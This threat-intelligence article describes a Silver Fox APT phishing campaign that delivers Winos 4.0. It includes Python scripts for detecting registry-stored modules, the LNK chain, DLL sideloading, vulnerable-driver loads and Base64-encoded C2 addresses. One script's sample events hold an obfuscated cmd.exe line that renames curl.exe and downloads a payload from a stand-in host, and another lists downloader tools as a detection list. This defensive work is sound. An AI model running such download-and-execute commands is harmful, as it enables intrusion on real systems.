
Silver Fox APT Deploys Winos 4.0 in Targeted Phishing Campaigns

Cybersecurity researchers at FortiGuard Labs have uncovered a sophisticated phishing campaign in Taiwan attributed to the Silver Fox APT group. Using tax audits, e-invoice notifications, and fake tax software, the attackers lure victims into installing malware that grants long-term control over compromised systems.

Over the past two months, these campaigns have shown advanced techniques like DLL sideloading and Bring Your Own Vulnerable Driver (BYOVD), demonstrating a high level of operational maturity. For CISOs, SOC teams, and IT managers, understanding these attack vectors is crucial for threat detection and mitigation.

This article explains:

  • How Silver Fox delivers malware and maintains persistence
  • Technical details of Winos 4.0 (ValleyRat) operations
  • Advanced evasion tactics including kernel-level access
  • Detection and mitigation strategies aligned with industry best practices

Who Is the Silver Fox APT Group?

The Silver Fox Advanced Persistent Threat (APT) group is a specialized cyberespionage actor targeting organizations in Asia, particularly Taiwan. Known for carefully crafted social engineering campaigns, their operations focus on:

  • Financial and governmental sectors
  • Using tax-related documents as lures
  • Deploying custom malware with long-term control capabilities

The recent campaigns suggest an organized subgroup within Silver Fox with dedicated development workflows, as evidenced by internal project naming conventions in Chinese discovered in malware DLLs.


Malware Used: Winos 4.0 (ValleyRat)

Winos 4.0, also referred to as ValleyRat, is the core payload deployed by Silver Fox. Key capabilities include:

  • Kernel-level access through BYOVD, loading a signed but vulnerable driver
  • DLL sideloading to bypass application allowlisting and signature-based detection
  • Defense evasion, including termination of security products (Microsoft Defender, Avast, AVG)
  • Plugin-based architecture for remote control, screen capture, file management, and system manipulation

Winos 4.0 limits what it writes to disk: downloaded modules are stored as registry values and loaded into memory from there, so file-based antivirus scanning has little to inspect.
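The practical check for registry-resident modules is to look for registry values large enough, or random enough, to be code. The script below is an added example written for this article, not FortiGuard's tooling: it parses a registry export in .reg text form (so it can be run offline against a hive exported from a suspect host) and flags binary values with a PE header, a large size, or high entropy. The key name, value names and blob contents are constructed for the demonstration.

```python
"""Triage an exported registry hive (.reg text) for values large enough to hold a
loadable module, the storage the article describes for Winos 4.0 modules.

Added example for this article, not FortiGuard code. Key names, value names and
the blob contents are constructed; they are not indicators from the report.
"""
import math
import re

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=hex(?:\((?P<type>[0-9a-fA-F]+)\))?:(?P<data>.*)$')
KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")


def parse_reg_binary_values(reg_text):
    """Yield (key, value_name, data_bytes) for every hex-encoded value in a .reg export.
    Binary values span several lines; every line but the last ends in a backslash."""
    key = None
    lines = iter(reg_text.splitlines())
    for line in lines:
        line = line.strip()
        km = KEY_RE.match(line)
        if km:
            key = km.group("key")
            continue
        vm = VALUE_RE.match(line)
        if not vm:
            continue                      # string/dword values are not interesting here
        data = vm.group("data")
        while data.endswith("\\"):        # pull in continuation lines
            data = data[:-1] + next(lines, "").strip()
        raw = bytes(int(b, 16) for b in data.split(",") if b)
        yield key, vm.group("name"), raw


def shannon_entropy(data):
    """Bits per byte, 0.0 for constant data up to 8.0 for uniformly random data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(reg_text, min_size=4096, min_entropy=6.5):
    """Flag values that look like stored code: PE header, big, or packed/encrypted."""
    findings = []
    for key, name, raw in parse_reg_binary_values(reg_text):
        flags = []
        if raw[:2] == b"MZ":
            flags.append("MZ header")
        if len(raw) >= min_size:
            flags.append(f"{len(raw)} bytes")
        ent = shannon_entropy(raw)
        if len(raw) >= 256 and ent >= min_entropy:   # entropy is meaningless on tiny values
            flags.append(f"entropy {ent:.2f}")
        if flags:
            findings.append((key, name, flags))
    return findings


def _to_reg_hex(data, per_line=24):
    """Render bytes the way regedit exports them: comma-separated hex, wrapped with '\\'."""
    parts = [f"{b:02x}" for b in data]
    chunks = [",".join(parts[i:i + per_line]) for i in range(0, len(parts), per_line)]
    return ",\\\n  ".join(chunks)


# Constructed hive export: a string value, a tiny flag value, and a 5 KiB stored module.
_MODULE = b"MZ\x90\x00" + bytes(range(256)) * 20      # MZ magic, then high-entropy filler
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_CURRENT_USER\\Software\\ExampleApp]\n"
    '"InstallPath"="C:\\\\Users\\\\mei\\\\ExampleApp"\n'
    '"Flags"=hex:01,00,00,00\n'
    '"Cache"=hex:' + _to_reg_hex(_MODULE) + "\n"
)

if __name__ == "__main__":
    for key, name, flags in triage(SAMPLE_REG):
        print(f"{key}\\{name}: {', '.join(flags)}")
```

On a live host the same logic applies to an export taken with reg.exe export, or to a hive file parsed with a registry library; the thresholds are starting points, and a loader that splits a module across many small values will need the per-key totals summed rather than each value judged alone.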


Phishing Delivery Mechanisms

1. LNK-Based Social Engineering

Victims often receive a RAR archive containing:

  • A decoy document
  • A malicious LNK (shortcut) file

Execution chain:

  1. LNK runs obfuscated commands via cmd.exe
  2. Copies legitimate curl.exe to a renamed file
  3. Downloads second-stage installer from a remote domain
  4. Extracts an executable into C:\ProgramData\Golden
  5. Deploys Winos 4.0

This works because users trust the familiar RAR archive, and because Explorer never displays the .lnk extension, so the shortcut passes for a document.
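Each step of that chain leaves a process-creation event, and the three that matter can be expressed as simple rules. The script below is an added example for this article, not FortiGuard's detection content: it runs three rules over constructed Sysmon Event ID 1 style records. Rule 1 relies on Sysmon's OriginalFileName field, which comes from the PE version resource and therefore survives the copy-and-rename of curl.exe. The command lines, the download host (files.example.invalid) and the file names inside the staging directory are illustrative, not indicators from the report.

```python
"""Hunt for the LNK -> cmd.exe -> renamed curl.exe -> staging-directory chain in
process-creation telemetry (Sysmon Event ID 1 style records).

Added example for this article, not code from FortiGuard. The event records are
constructed; the command lines, download host and file names are illustrative
and are not indicators from the report.
"""
import ntpath
import re

STAGING_DIRS = ("c:\\programdata\\golden",)                  # staging path named in the report
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}  # assumption: common built-in downloaders
PATH_RE = re.compile(r'[A-Za-z]:\\[^\s"]+')                  # drive-letter paths in a command line
ENVVAR_RE = re.compile(r"%[A-Za-z0-9_]+%")

# Constructed Sysmon Event ID 1 records, using Sysmon's field names.
EVENTS = [
    {   # Explorer launching the LNK target: a caret-obfuscated cmd.exe one-liner
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"cmd.exe /c c^o^p^y C:\Windows\System32\cu^rl.exe C:\ProgramData\Golden\svc.exe "
                       r"&& C:\ProgramData\Golden\svc.exe -^o C:\ProgramData\Golden\inst.exe "
                       r"https://files.example.invalid/x",
    },
    {   # The renamed copy of curl.exe fetching the second stage
        "Image": r"C:\ProgramData\Golden\svc.exe",
        "OriginalFileName": "curl.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"C:\ProgramData\Golden\svc.exe -o C:\ProgramData\Golden\inst.exe https://files.example.invalid/x",
    },
    {   # The downloaded installer running from the staging directory
        "Image": r"C:\ProgramData\Golden\inst.exe",
        "OriginalFileName": "inst.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"C:\ProgramData\Golden\inst.exe",
    },
    {   # Benign: curl.exe run under its own name from a terminal
        "Image": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "ParentImage": r"C:\Windows\System32\WindowsTerminal.exe",
        "CommandLine": r"curl.exe -I https://www.example.com/",
    },
]


def _basename(path):
    return ntpath.basename(path).lower()


def _in_staging(path):
    p = path.lower()
    return any(p.startswith(d + "\\") for d in STAGING_DIRS)


def check_event(ev):
    """Return the names of the rules the event trips (empty for a benign event)."""
    hits = []
    image, orig = _basename(ev["Image"]), ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "")
    # Rule 1: the PE version resource says curl.exe (or another downloader) but the
    # on-disk name differs: the "copy curl.exe to a renamed file" step.
    if orig in DOWNLOADERS and image != orig:
        hits.append("renamed-downloader")
    # Rule 2: explorer.exe -> cmd.exe (what a double-clicked LNK looks like) whose
    # command line hides its keywords behind carets or environment-variable pieces.
    if image == "cmd.exe" and _basename(ev["ParentImage"]) == "explorer.exe":
        if cmd.count("^") >= 3 or len(ENVVAR_RE.findall(cmd)) >= 2:
            hits.append("lnk-obfuscated-cmd")
    # Rule 3: anything running from, or referring to, the staging directory.
    if _in_staging(ev["Image"]) or any(_in_staging(p) for p in PATH_RE.findall(cmd)):
        hits.append("staging-dir")
    return hits


def hunt(events):
    """Events worth a look, as (image, rules) pairs, in the order seen."""
    return [(ev["Image"], hits) for ev in events for hits in [check_event(ev)] if hits]


if __name__ == "__main__":
    for image, rules in hunt(EVENTS):
        print(f"{image}: {', '.join(rules)}")
```

The staging path is the one thing in these rules that is specific to this campaign; the other two (a downloader whose on-disk name does not match its version resource, and an obfuscated cmd.exe launched by Explorer) hold up across LNK-based lures in general.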


2. DLL Sideloading

In newer campaigns, attackers:

  • Pair legitimate executables with malicious DLLs
  • When the trusted application launches, it loads the attacker-controlled DLL
  • Initiates the next stage of infection

This technique enables stealthy malware execution without triggering signature-based detection.
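Sideloading is visible in image-load telemetry as a DLL loaded from the same directory as the executable, where that directory is one a user can write to. The scoring function below is an added example for this article, not FortiGuard's detection logic: it runs over constructed Sysmon Event ID 7 style records and weighs three signals (side-by-side load from a user-writable directory, an unsigned or invalidly signed DLL, and a DLL name that collides with a library commonly loaded by name). The application name, user paths, signer strings and the short list of hijackable DLL names are assumptions made for the demonstration.

```python
"""Flag DLL sideloading in image-load telemetry (Sysmon Event ID 7 style records).

Added example for this article, not code from FortiGuard. Sample events are
constructed; the application name, paths and signer strings are illustrative.
"""
import ntpath

# Directories where a signed application legitimately sits next to its own DLLs
# (admin-only by default, so not where a phishing lure can drop a pair of files).
PROTECTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# DLL names that applications import by name, so a copy next to the EXE wins the
# search order. Assumption: a short illustrative list, not the report's.
HIJACKABLE_NAMES = {"version.dll", "dbghelp.dll", "wininet.dll", "userenv.dll",
                    "cryptbase.dll", "msimg32.dll", "libcurl.dll"}

EVENTS = [
    {   # Unsigned version.dll next to a legitimately signed app in a temp folder
        "Image": r"C:\Users\mei\AppData\Local\Temp\TaxUpdate\TaxUpdate.exe",
        "ImageLoaded": r"C:\Users\mei\AppData\Local\Temp\TaxUpdate\version.dll",
        "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable",
    },
    {   # Same app loading the real version.dll from System32
        "Image": r"C:\Users\mei\AppData\Local\Temp\TaxUpdate\TaxUpdate.exe",
        "ImageLoaded": r"C:\Windows\System32\version.dll",
        "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid",
    },
    {   # Vendor app loading its own signed helper from Program Files
        "Image": r"C:\Program Files\ExampleVendor\Viewer.exe",
        "ImageLoaded": r"C:\Program Files\ExampleVendor\render.dll",
        "Signed": "true", "Signature": "Example Vendor Ltd", "SignatureStatus": "Valid",
    },
    {   # Validly signed DLL, but user-writable folder and a hijackable name: still worth a look
        "Image": r"C:\Users\mei\Downloads\Tool\Tool.exe",
        "ImageLoaded": r"C:\Users\mei\Downloads\Tool\dbghelp.dll",
        "Signed": "true", "Signature": "Some Publisher", "SignatureStatus": "Valid",
    },
]


def _dir(path):
    return ntpath.dirname(path).lower()


def _under_protected_root(path):
    return path.lower().startswith(PROTECTED_ROOTS)


def score_image_load(ev):
    """Return (severity, reasons); severity 0 means nothing to report."""
    host, dll = ev["Image"], ev["ImageLoaded"]
    if _dir(host) != _dir(dll):
        return 0, []                    # not side by side, so not sideloading
    if _under_protected_root(dll):
        return 0, []                    # normal application layout in an admin-only directory
    reasons = ["DLL loaded from the EXE's own user-writable directory"]
    severity = 1
    if ev.get("Signed", "false").lower() != "true" or ev.get("SignatureStatus") != "Valid":
        reasons.append("DLL unsigned or signature invalid")
        severity += 2
    if ntpath.basename(dll).lower() in HIJACKABLE_NAMES:
        reasons.append("DLL name collides with a library commonly sideloaded")
        severity += 1
    return severity, reasons


def find_sideloads(events, min_severity=2):
    """(host, dll, severity, reasons) for every event at or above the threshold."""
    return [(ev["Image"], ev["ImageLoaded"], sev, why)
            for ev in events
            for sev, why in [score_image_load(ev)] if sev >= min_severity]


if __name__ == "__main__":
    for host, dll, sev, why in find_sideloads(EVENTS):
        print(f"[{sev}] {host} loaded {dll}: {'; '.join(why)}")
```

Sysmon only reports signature details for the loaded image, not for the host process, so a production rule that wants to compare signers (a Microsoft-signed EXE loading a DLL signed by someone else) has to join in the host's signer from a file catalog or from the Event ID 1 record of the process.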


Bring Your Own Vulnerable Driver (BYOVD) Technique

Winos 4.0 first bypasses User Account Control (UAC) with a debug-object hijacking technique to obtain an elevated token, then loads a signed but vulnerable kernel driver (wsftprm.sys) to:

  • Execute with kernel-level privileges
  • Terminate security software and evade monitoring

Key API functions abused:

  • RtlAdjustPrivilege (ntdll.dll), to enable SeLoadDriverPrivilege in the elevated token
  • NtLoadDriver (ntdll.dll), to load the driver directly from a registry service key without going through the Service Control Manager

Because the driver carries a valid signature, Driver Signature Enforcement accepts it. The malware then uses the driver's flaws to perform privileged operations, including killing security processes, while staying below the visibility of endpoint security solutions.
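Two telemetry sources catch this: the driver-load event itself, and the registry write that has to precede it, because NtLoadDriver needs a Services\<name> key whose ImagePath points at the .sys file. The script below is an added example for this article, not FortiGuard's detection content: it reviews constructed Sysmon Event ID 6 (DriverLoad) and Event ID 13 (registry value set) style records, treating a valid signature as no reason for confidence. The SHA-256 values standing in for a vulnerable-driver blocklist and a golden-image baseline are placeholders, not real hashes, and the paths are illustrative.

```python
"""Review driver-load and service-key telemetry for BYOVD activity.

Added example for this article, not FortiGuard code. Checks Sysmon Event ID 6
(DriverLoad) and Event ID 13 (RegistryEvent value set) style records. All hashes,
paths and baseline contents below are constructed placeholders, not indicators.
"""
import re

# Placeholders for a vulnerable-driver blocklist (e.g. the Microsoft recommended
# driver block rules) and a trusted baseline taken from a golden image.
VULN_DRIVER_SHA256 = {"a" * 64}
BASELINE_SHA256 = {"b" * 64, "c" * 64}
DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\", "c:\\windows\\system32\\driverstore\\")

EVENTS = [
    {   # Event 13: service key created for a driver staged under ProgramData
        "EventID": 13,
        "TargetObject": r"HKLM\System\CurrentControlSet\Services\wsftprm\ImagePath",
        "Details": r"\??\C:\ProgramData\Golden\wsftprm.sys",
    },
    {   # Event 6: validly signed, but a known-vulnerable build, loaded from ProgramData
        "EventID": 6,
        "ImageLoaded": r"C:\ProgramData\Golden\wsftprm.sys",
        "Hashes": "SHA256=" + "a" * 64,
        "Signed": "true", "SignatureStatus": "Valid",
    },
    {   # Event 6: baseline driver from the normal location
        "EventID": 6,
        "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
        "Hashes": "SHA256=" + "b" * 64,
        "Signed": "true", "SignatureStatus": "Valid",
    },
    {   # Event 6: signed vendor driver that nobody added to the baseline
        "EventID": 6,
        "ImageLoaded": r"C:\Program Files\ExampleVendor\exvend.sys",
        "Hashes": "SHA256=" + "d" * 64,
        "Signed": "true", "SignatureStatus": "Valid",
    },
]


def _sha256(hashes_field):
    m = re.search(r"SHA256=([0-9a-fA-F]{64})", hashes_field)
    return m.group(1).lower() if m else None


def review_driver_load(ev):
    """Reasons to act on an Event ID 6 record. A valid signature is never a pass by itself."""
    reasons = []
    path = ev["ImageLoaded"]
    h = _sha256(ev.get("Hashes", ""))
    if h in VULN_DRIVER_SHA256:
        reasons.append("hash is on the vulnerable-driver blocklist")
    if not path.lower().startswith(DRIVER_DIRS):
        reasons.append("loaded from outside the system driver directories")
    if h not in BASELINE_SHA256:
        reasons.append("hash not in the trusted driver baseline")
    if reasons and ev.get("Signed") == "true" and ev.get("SignatureStatus") == "Valid":
        reasons.append("note: signature is valid, which is exactly what BYOVD relies on")
    return reasons


def review_service_key(ev):
    """Reasons to act on an Event ID 13 record that sets Services\\<name>\\ImagePath."""
    m = re.search(r"\\Services\\([^\\]+)\\ImagePath$", ev["TargetObject"], re.I)
    if not m:
        return []
    image = ev["Details"]
    if image.startswith("\\??\\"):                       # NT path prefix used by ImagePath
        image = image[4:]
    if image.lower().startswith("\\systemroot\\"):
        image = "C:\\Windows\\" + image[len("\\systemroot\\"):]
    if image.lower().endswith(".sys") and not image.lower().startswith(DRIVER_DIRS):
        return [f"service '{m.group(1)}' points at a driver outside the driver directories: {image}"]
    return []


def review(events):
    """(subject, reasons) for every record with something to say, in order."""
    out = []
    for ev in events:
        reasons = review_driver_load(ev) if ev["EventID"] == 6 else review_service_key(ev)
        if reasons:
            out.append((ev.get("ImageLoaded") or ev["TargetObject"], reasons))
    return out


if __name__ == "__main__":
    for subject, reasons in review(EVENTS):
        print(subject)
        for r in reasons:
            print("  -", r)
```

The Event ID 13 rule only fires if the Sysmon configuration includes HKLM\System\CurrentControlSet\Services in its RegistryEvent filters; it is worth adding because it fires before the driver is in the kernel, which is the last moment the endpoint sensor can be trusted.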


Command-and-Control (C2) Infrastructure

  • C2 addresses are stored Base64-encoded inside the binaries rather than in clear text
  • Additional modules are downloaded and stored in the Windows registry
  • Remote control, file management, and system monitoring run from those modules without new files being written to disk
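Base64 hides the C2 address from a plain strings pass but not from a slightly smarter one. The script below is an added example for this article, not FortiGuard's analysis tooling: it scans a byte buffer for Base64-looking runs, decodes the ones that decode cleanly, and keeps only results that look like host:port. The sample buffer is constructed in the script; the two addresses it contains are from documentation-reserved ranges (192.0.2.0/24, example.net) and are not real C2 servers.

```python
"""Pull Base64-encoded host:port strings out of a binary, the way an analyst would
triage a sample that stores its C2 address encoded rather than in clear text.

Added example for this article, not FortiGuard code. The sample bytes are
constructed here; the addresses are documentation ranges, not real C2 servers.
"""
import base64
import binascii
import re

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")     # 16+ chars: 12 bytes, enough for host:port
HOST_PORT = re.compile(r"[A-Za-z0-9.\-]+:\d{1,5}")


def decode_base64_runs(blob):
    """Yield (offset, decoded_bytes) for every Base64-looking run that decodes cleanly."""
    for m in B64_RUN.finditer(blob):
        run = m.group(0)
        if len(run) % 4 == 1:               # no valid Base64 string has this length
            continue
        run += b"=" * (-len(run) % 4)       # tolerate stripped padding
        try:
            decoded = base64.b64decode(run, validate=True)
        except binascii.Error:
            continue
        yield m.start(), decoded


def extract_c2_candidates(blob):
    """Decoded runs that look like host:port, in file order."""
    out = []
    for _, data in decode_base64_runs(blob):
        try:
            text = data.decode("ascii")
        except UnicodeDecodeError:          # binary junk that happened to decode
            continue
        if HOST_PORT.fullmatch(text):
            out.append(text)
    return out


# Constructed sample "binary": a DOS stub, filler, two encoded addresses, and an
# all-alphanumeric string that is NOT Base64 (it decodes to junk and is dropped).
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 8
    + base64.b64encode(b"192.0.2.10:443") + b"\x00"
    + b"AAAABBBBCCCCDDDD" + b"\x00"
    + b"Kernel32.dll\x00LoadLibraryA\x00"
    + base64.b64encode(b"c2.example.net:8080") + b"\x00"
)

if __name__ == "__main__":
    for offset, data in decode_base64_runs(SAMPLE_BLOB):
        print(f"0x{offset:06x}: {data!r}")
    print("C2 candidates:", extract_c2_candidates(SAMPLE_BLOB))
```

Against a real sample the same scan should be run over the unpacked image as well as the file on disk, since a packed stage keeps its strings encrypted until runtime; a single-byte XOR layer on top of the Base64, which is common, is handled by trying the 255 keys before the Base64 pass.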

Infrastructure analysis revealed domain registration overlaps and development machine identifiers linking the operations to prior Silver Fox campaigns, suggesting an evolving, coordinated effort.


Indicators of Compromise (IOCs)

Security teams should monitor for:

  • Malicious LNK files in email attachments
  • DLLs loaded by signed executables from user-writable directories (sideloading)
  • Unauthorized driver loading activity
  • Loading of wsftprm.sys or other signed but vulnerable drivers, particularly from outside the system driver directory
  • Termination of security processes such as MsMpEng.exe (Defender), Avast, or AVG

Early detection relies on behavioral monitoring, application allowlisting, and registry auditing.


Mitigation and Defense Strategies

1. Email & Phishing Controls

  • Treat tax-related attachments and invoice links with caution
  • Enable sandboxing and advanced threat detection for email attachments
  • Conduct security awareness training for employees

2. DLL & Driver Monitoring

  • Implement driver blocklists, such as the Microsoft vulnerable driver blocklist enforced through WDAC or HVCI
  • Monitor for DLL sideloading via SIEM or EDR solutions
  • Validate all kernel drivers against trusted baselines

3. Endpoint Hardening

  • Restrict administrative privileges; keep UAC enabled, but do not treat it as a security boundary, since this campaign bypasses it
  • Enforce application allowlisting
  • Use behavior-based detection to monitor process anomalies

4. Threat Intelligence Integration

  • Monitor domain rotation and cloud-hosted payloads
  • Share IOCs across financial institutions and cybersecurity networks
  • Integrate with FortiGuard or other APT intelligence feeds

Common Mistakes Organizations Make

  1. Ignoring tax-related social engineering campaigns
  2. Failing to monitor driver loading and DLL sideloading
  3. Assuming signed drivers are safe
  4. Relying solely on antivirus signatures
  5. Delaying patching and baseline validation

A proactive, layered approach combining human awareness, endpoint hardening, and threat intelligence is essential.


FAQs About Winos 4.0 and Silver Fox

1. What is Winos 4.0 (ValleyRat)?

It’s a malware payload deployed by Silver Fox that enables remote control, system manipulation, and defense evasion via kernel-level access and DLL sideloading.

2. How does Silver Fox deliver the malware?

Through phishing campaigns using RAR archives, LNK shortcut files, fake tax software installers, and DLL sideloading techniques.

3. What is BYOVD?

Bring Your Own Vulnerable Driver (BYOVD) is a tactic where malware loads a signed but vulnerable driver to gain kernel privileges and bypass monitoring controls.

4. How can organizations detect these attacks?

Monitor for unauthorized driver loading, DLL sideloading, unusual registry changes, and terminated security processes.

5. Why is domain rotation a challenge?

Attackers rotate domains and abuse cloud hosting, making static blocking ineffective and requiring dynamic threat intelligence.


Key Takeaways

  • Silver Fox APT is executing targeted phishing campaigns in Taiwan.
  • Winos 4.0 (ValleyRat) is a sophisticated, plugin-based malware.
  • Delivery relies on LNK shortcuts and DLL sideloading; BYOVD then provides kernel-level defense evasion.
  • Kernel-level access and defense evasion tactics make detection challenging.
  • Layered defenses combining email controls, endpoint hardening, and threat intelligence are critical.

For cybersecurity teams, understanding these advanced APT tactics is essential for protecting enterprise endpoints and sensitive systems from evolving threats.


Conclusion

The Silver Fox campaigns demonstrate highly evolved tradecraft that blends social engineering, mature plugin-based malware, and kernel-level defense evasion through a vulnerable signed driver.

Organizations must adopt proactive threat detection, email security, and endpoint hardening to defend against Winos 4.0.

Security awareness, monitoring, and dynamic threat intelligence together reduce the chance that these targeted attacks escalate into significant operational or financial damage.
